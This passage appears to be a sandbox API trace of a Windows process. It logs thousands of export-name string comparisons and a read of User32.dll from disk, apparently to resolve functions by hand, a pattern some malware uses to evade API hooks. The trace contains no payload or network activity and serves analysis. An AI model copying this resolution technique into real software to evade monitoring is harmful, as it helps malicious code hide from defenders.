lpString2="AssocGetPerceivedType") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0150.841] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0150.841] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0150.842] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0150.964] GetProcessHeap () returned 0x520000 [0150.964] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x520000) returned 1 [0150.964] GetProcessHeap () returned 0x520000 [0150.964] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539820 [0150.964] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0150.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.965] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0150.965] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0150.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.966] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0150.966] GetProcessHeap () returned 0x520000 [0150.966] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1555b8) returned 0x412e040 [0150.970] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.970] ReadFile (in: hFile=0x17c, lpBuffer=0x412e040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412e040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0150.990] CloseHandle (hObject=0x17c) returned 1 [0150.990] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0150.991] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0150.991] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0150.991] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0150.991] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0150.991] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0150.991] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0150.991] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0150.991] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0150.991] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0150.991] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0150.991] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0150.991] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0150.991] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0150.991] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0150.991] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0150.992] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0150.992] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0150.993] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0150.993] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0150.993] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0151.075] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0151.075] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0151.075] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0151.075] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0151.075] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0151.076] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0151.076] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0151.076] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0151.076] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0151.076] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0151.076] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0151.077] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0151.077] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0151.077] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0151.077] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0151.077] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0151.077] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0151.077] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0151.077] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0151.077] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0151.077] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0151.078] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0151.078] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0151.079] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0151.079] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0151.079] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0151.080] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0151.081] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0151.082] lstrcmpA 